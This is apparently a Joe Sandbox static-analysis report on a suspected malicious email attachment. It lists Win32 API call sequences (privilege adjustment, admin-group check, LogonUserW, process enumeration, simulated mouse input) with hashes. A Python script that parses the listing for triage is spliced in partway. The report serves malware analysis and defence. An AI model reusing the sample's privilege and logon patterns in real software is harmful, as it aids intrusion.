                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                          • String ID:
                                                                                                          • API String ID: 1682464887-0
                                                                                                          • Opcode ID: b4acdbe9a00402806bc5f35f219744b5d0ce3d7c04ff2bf1ac759d88d7c2e97f
                                                                                                          • Instruction ID: cd0c22193fcd15e90d7d1b6f945a1f8dc9ccd52ccd4022f0771c7579c14ba992
                                                                                                          • Opcode Fuzzy Hash: b4acdbe9a00402806bc5f35f219744b5d0ce3d7c04ff2bf1ac759d88d7c2e97f
                                                                                                          • Instruction Fuzzy Hash: 56217135A00618EFCB00EFA5D885EEDBBB8FF49311F1480AAE905AB351CB75A915CF50
                                                                                                          APIs
                                                                                                            • Part of subcall function 00770DB6: std::exception::exception.LIBCMT ref: 00770DEC
                                                                                                            • Part of subcall function 00770DB6: __CxxThrowException@8.LIBCMT ref: 00770E01
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A882B
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8858
                                                                                                          • GetLastError.KERNEL32 ref: 007A8865
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                          • String ID:
                                                                                                          • API String ID: 1922334811-0
                                                                                                          • Opcode ID: f4dd714c53d346a5bfdfe88115d5ee7b12b805b2a609f487a892a1f63f9d0e7d
                                                                                                          • Instruction ID: b17fe638203e87e35e9fe5dda0f9601ea15ae3d1851063e23478f8a29ba063fa
                                                                                                          • Opcode Fuzzy Hash: f4dd714c53d346a5bfdfe88115d5ee7b12b805b2a609f487a892a1f63f9d0e7d
                                                                                                          • Instruction Fuzzy Hash: D1116DB2514304AFE728EFA4DC85D6BB7F8EB45710B24C62EE45697241EE78AC408B60
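The API sequences listed in these entries (the two-call GetTokenInformation/HeapAlloc idiom, LoadLibraryA/GetProcAddress resolution of GetNativeSystemInfo, the Toolhelp32 process walk, SetErrorMode around GetDiskFreeSpaceExW, LookupPrivilegeValueW/AdjustTokenPrivileges, and the AllocateAndInitializeSid/CheckTokenMembership/FreeSid group check) are quicker to triage once pulled out of the listing and the immediates decoded. The following is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses "APIs" entries in this format, tags each function with a behaviour label and names the documented Win32 constants it sees. The label table, the constant table and the sample subset (lines copied from the entries in this section) are this example's own assumptions. The report prints arguments as a snapshot of stack slots at the call site, so no-parameter APIs such as GetProcessHeap and GetLastError show neighbouring slots, and "?" is a value the static pass could not resolve; the example only decodes positions that are real parameters of the named API.

```python
"""Parse the per-function "APIs" entries of a Joe Sandbox IDA-plugin listing and
tag each function with the Win32 behaviour its call sequence implements.
Added example, not Joe Sandbox or AutoIt code. SAMPLE_REPORT is copied from the
entries in this section; TECHNIQUES and ARG_MEANINGS are this example's own mapping
of documented Win32 constants (assumption: 8 hex digits = immediate, '?' = unresolved)."""
import re
from collections import namedtuple

# Constructed input: lines copied from the report entries above, one function per "APIs".
SAMPLE_REPORT = """\
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007A80C0
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007A80D9
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007A80E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007A80F6
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00754AD0), ref: 00754B45
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00754B57
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 007CEE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 007CEE4B
  • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
• Process32NextW.KERNEL32(00000000,?), ref: 007CEF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 007CEF1A
APIs
• SetErrorMode.KERNEL32(00000001), ref: 007BB343
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007BB39D
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007BB3EA
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007A882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007A8858
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007A8774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007A878B
• FreeSid.ADVAPI32(?), ref: 007A879B
"""

API_LINE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[\w:@]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# subcall=True marks "Part of subcall function" lines, which belong to a callee, not this function.
Call = namedtuple("Call", "name args ref subcall")

def parse_arg(tok):
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok

def parse_entries(text):
    """Split the listing at each 'APIs' header; return one list of Call per function."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            entries.append([])
            continue
        m = API_LINE.search(line) if entries else None
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            entries[-1].append(Call(m["name"], args, int(m["ref"], 16), bool(m["sub"])))
    return entries

def api_names(calls):
    return {c.name for c in calls if not c.subcall}

# Behaviour labels: every API in the set must appear among the function's own calls.
TECHNIQUES = [
    ({"AllocateAndInitializeSid", "CheckTokenMembership"}, "group membership check (IsAdmin-style)"),
    ({"LookupPrivilegeValueW", "AdjustTokenPrivileges"}, "token privilege adjustment"),
    ({"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}, "process enumeration (Toolhelp32)"),
    ({"LoadLibraryA", "GetProcAddress"}, "dynamic API resolution"),
    ({"GetTokenInformation", "HeapAlloc"}, "token inspection (size query, allocate, re-query)"),
    ({"SetErrorMode", "GetDiskFreeSpaceExW"}, "drive query with critical-error dialogs suppressed"),
]

# (API, parameter index) -> immediate -> documented constant.
ARG_MEANINGS = {
    ("GetTokenInformation", 1): {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges"},
    ("SetErrorMode", 0): {0: "restore default error mode", 1: "SEM_FAILCRITICALERRORS"},
    ("AllocateAndInitializeSid", 2): {0x20: "SECURITY_BUILTIN_DOMAIN_RID"},
    ("AllocateAndInitializeSid", 3): {0x220: "DOMAIN_ALIAS_RID_ADMINS"},
}

def decode_args(call):
    return [f"{call.name} arg{i}={v:#x} -> {ARG_MEANINGS[(call.name, i)][v]}"
            for i, v in enumerate(call.args)
            if isinstance(v, int) and v in ARG_MEANINGS.get((call.name, i), {})]

def sid_from_trace(call):
    """Rebuild the SID from AllocateAndInitializeSid(auth, count, rid0..rid7, &sid). The
    authority is printed as '?' in the report, so it stays '?' instead of being assumed."""
    if call.name != "AllocateAndInitializeSid" or len(call.args) < 10 or not isinstance(call.args[1], int):
        return None
    auth = "?" if call.args[0] is None else str(call.args[0])
    return f"S-1-{auth}-" + "-".join(str(r) for r in call.args[2:2 + call.args[1]])

def analyse(text):
    return [{"labels": [lab for req, lab in TECHNIQUES if req <= api_names(calls)],
             "decoded": [d for c in calls for d in decode_args(c)],
             "sids": [s for c in calls if (s := sid_from_trace(c))]}
            for calls in parse_entries(text)]
```

Against the sample, the AllocateAndInitializeSid line decodes to a two-sub-authority SID with RIDs 32 and 544; if the unresolved authority is SECURITY_NT_AUTHORITY (5) that is BUILTIN\Administrators, S-1-5-32-544, and CheckTokenMembership against it is the usual shape of an "is the caller an administrator" test. Because the report does not show the authority, the example reports S-1-?-32-544 rather than guessing. The two GetTokenInformation calls with class 2 (TokenGroups) around HeapAlloc are the standard size-query, allocate, re-query idiom, and SetErrorMode(1) sets SEM_FAILCRITICALERRORS so that probing a drive with GetDiskFreeSpaceExW cannot raise a "no disk" dialog that would stall an unattended run.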
                                                                                                          APIs
                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007A8774
                                                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007A878B
                                                                                                          • FreeSid.ADVAPI32(?), ref: 007A879B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 3429775523-0
                                                                                                          • Opcode ID: 52682c1007176243c006e7747b700a5742b4b06ae5ce3bc75e7077123e24c0c6
                                                                                                          • Instruction ID: 6dd359991f7643436081f34335cccfcf6c364918b8ceaff5437478ccb307528f
                                                                                                          • Opcode Fuzzy Hash: 52682c1007176243c006e7747b700a5742b4b06ae5ce3bc75e7077123e24c0c6
                                                                                                          • Instruction Fuzzy Hash: 10F04F75A1130CBFDF00DFF4DC89AADB7BCEF08201F508469E502E3281D6755A048B54
                                                                                                          APIs
                                                                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 007B4CB3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: mouse_event
                                                                                                          • String ID: DOWN
                                                                                                          • API String ID: 2434400541-711622031
                                                                                                          • Opcode ID: 5592e57d0457dacaea08e80b4d23a6ffdedfdc689a387ec821758969cdde2d68
                                                                                                          • Instruction ID: 21edce1f9bf18644cc5fca3ef09f2511c514adf50c72a8c9cd625249fa01797a
                                                                                                          • Opcode Fuzzy Hash: 5592e57d0457dacaea08e80b4d23a6ffdedfdc689a387ec821758969cdde2d68
                                                                                                          • Instruction Fuzzy Hash: C9E04F6219972138F9842518BC0AEF7074C8B127317515146F824D51C2ED8C1C8324B8
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 007BC6FB
                                                                                                          • FindClose.KERNEL32(00000000), ref: 007BC72B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 2295610775-0
                                                                                                          • Opcode ID: 49f3fe5d1ec0dfd1db25575eea9ba6c1d534104661f618e66da3dcf73493edc5
                                                                                                          • Instruction ID: af3781761f9e20e3780c0dede563dee0a22703c22064a4ba928034ca8d849855
                                                                                                          • Opcode Fuzzy Hash: 49f3fe5d1ec0dfd1db25575eea9ba6c1d534104661f618e66da3dcf73493edc5
                                                                                                          • Instruction Fuzzy Hash: B51170716006049FDB109F29C849A6AB7E5EF85321F04851AF9A59B290DB74A805CF81
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007C9468,?,007DFB84,?), ref: 007BA097
                                                                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007C9468,?,007DFB84,?), ref: 007BA0A9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFormatLastMessage
                                                                                                          • String ID:
                                                                                                          • API String ID: 3479602957-0
                                                                                                          • Opcode ID: 4352783d03ee831a296e6e8858b3a412b6762df3d0f563d1c1996e50b3b9b6cb
                                                                                                          • Instruction ID: 3c1d6db63b08def6aca680ccb489570a47d4026843d743ee134309c7e5f83f8f
                                                                                                          • Opcode Fuzzy Hash: 4352783d03ee831a296e6e8858b3a412b6762df3d0f563d1c1996e50b3b9b6cb
                                                                                                          • Instruction Fuzzy Hash: BBF0823514522DBBDB21BFA4DC48FEA776CBF08361F008166F909D6181D674A944CBA1
                                                                                                          APIs
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007A8309), ref: 007A81E0
                                                                                                          • CloseHandle.KERNEL32(?,?,007A8309), ref: 007A81F2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 81990902-0
                                                                                                          • Opcode ID: 9f65473554ca62b7aa36953ae475a5bff69ec406d72fc647df45b06dbc3170b1
                                                                                                          • Instruction ID: 2e3a4920c12140d0b56fb394e3ac908e35b45cba069ba8f36177c2f34df9de7e
                                                                                                          • Opcode Fuzzy Hash: 9f65473554ca62b7aa36953ae475a5bff69ec406d72fc647df45b06dbc3170b1
                                                                                                          • Instruction Fuzzy Hash: A7E0EC72011A10EFEB252B74EC09D777BFAEF04350714C92EF8AA84470DB66AC91DB54
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00778D57,?,?,?,00000001), ref: 0077A15A
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0077A163
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: ad1ae0e169e6ef38e5eb7da79caf61ab602e3d20ec76683a9e2566eab59f24d4
                                                                                                          • Instruction ID: 723b5d1694736db26958cb6d26c585ab0e301c97f4adf93a1d29c4041af5661e
                                                                                                          • Opcode Fuzzy Hash: ad1ae0e169e6ef38e5eb7da79caf61ab602e3d20ec76683a9e2566eab59f24d4
                                                                                                          • Instruction Fuzzy Hash: 3FB09231055208ABCA002B95EC09B883F78EB44AA2F41C022F60E84060CB6654508A99
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 45e1ab2c05fbb1ce24caa118c99cff984d817be705ef200ac487ec791203667a
                                                                                                          • Instruction ID: 332ba4654e375295ca9855a548825962888bd590095b1675ee3d57665bef7efc
                                                                                                          • Opcode Fuzzy Hash: 45e1ab2c05fbb1ce24caa118c99cff984d817be705ef200ac487ec791203667a
                                                                                                          • Instruction Fuzzy Hash: 86323662D2AF814DDB279634D972335A248AFBB3C4F15D737F819B99A6EB2CC4834104
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 72959ec6af4520cb8c0d9e5e0967e8015a25299bf9fd9d5ff5779204470d67ac
                                                                                                          • Instruction ID: cad41e7eeacbea12eaa1f274067f3e80b0feae0f43b12e6be84a6f3b914b10ba
                                                                                                          • Opcode Fuzzy Hash: 72959ec6af4520cb8c0d9e5e0967e8015a25299bf9fd9d5ff5779204470d67ac
                                                                                                          • Instruction Fuzzy Hash: A4B10020D2AF804DD323A6398871336B75CAFBB2C5F52D71BFC2678D62EB2595834241
                                                                                                          APIs
                                                                                                          • __time64.LIBCMT ref: 007B889B
                                                                                                            • Part of subcall function 0077520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007B8F6E,00000000,?,?,?,?,007B911F,00000000,?), ref: 00775213
                                                                                                            • Part of subcall function 0077520A: __aulldiv.LIBCMT ref: 00775233
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$FileSystem__aulldiv__time64
                                                                                                          • String ID:
                                                                                                          • API String ID: 2893107130-0
                                                                                                          • Opcode ID: ce141398042fcd46314e87106cd9e5517798c1e2a0af8e7823f35327a5ffcde0
                                                                                                          • Instruction ID: 3ac7f5984c603972bbe1b1ee9454dd9eff2531281d7999f495d34db6ee963cd3
                                                                                                          • Opcode Fuzzy Hash: ce141398042fcd46314e87106cd9e5517798c1e2a0af8e7823f35327a5ffcde0
                                                                                                          • Instruction Fuzzy Hash: 7D21DF72635610CBC729CF29D841B92B3E9EFA4310B288E6CE0F5CB2C0CA34A945CB54
                                                                                                          APIs
                                                                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007A8389), ref: 007A87D1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LogonUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 1244722697-0
                                                                                                          • Opcode ID: 45566dd488d3ba071d984547ad0f5a54157b6ff9c241bc9c1b1c53574ef331fc
                                                                                                          • Instruction ID: 14337a7d297767fe570a9c8c1a36846ee17671748f66915a7136190f25b3d144
                                                                                                          • Opcode Fuzzy Hash: 45566dd488d3ba071d984547ad0f5a54157b6ff9c241bc9c1b1c53574ef331fc
                                                                                                          • Instruction Fuzzy Hash: 63D09E3226450EABEF019EA4DD05EAE3B69EB04B01F408511FE16D61A1C775D935AB60
                                                                                                          APIs
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0077A12A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192549508-0
                                                                                                          • Opcode ID: ea86fbdfe1a4eb2f0fc859c6d4a6445623f880ba4b10c49a8aa14688b5b42caa
                                                                                                          • Instruction ID: 5929bcbe14cb47bef045c3d0c18237c3e1c9010939164d267bc6ccedf9c262b1
                                                                                                          • Opcode Fuzzy Hash: ea86fbdfe1a4eb2f0fc859c6d4a6445623f880ba4b10c49a8aa14688b5b42caa
                                                                                                          • Instruction Fuzzy Hash: F6A0113000020CABCA002B8AEC08888BFACEA002A0B008022F80E800228B32A8208A88
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 83e22f00db7317f6a4e389a4fb992c3219cf7c0b039bb9d783fe7c96662823a2
                                                                                                          • Instruction ID: 7a22d70dfadc0ae914a2d1e114821331c0065f8eb1d6339cba826b5a5a8615ae
                                                                                                          • Opcode Fuzzy Hash: 83e22f00db7317f6a4e389a4fb992c3219cf7c0b039bb9d783fe7c96662823a2
                                                                                                          • Instruction Fuzzy Hash: E6224630604606CBDF688A64C89477D77A1FB82344F28836BDD539B592EB7CAD91CA43
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
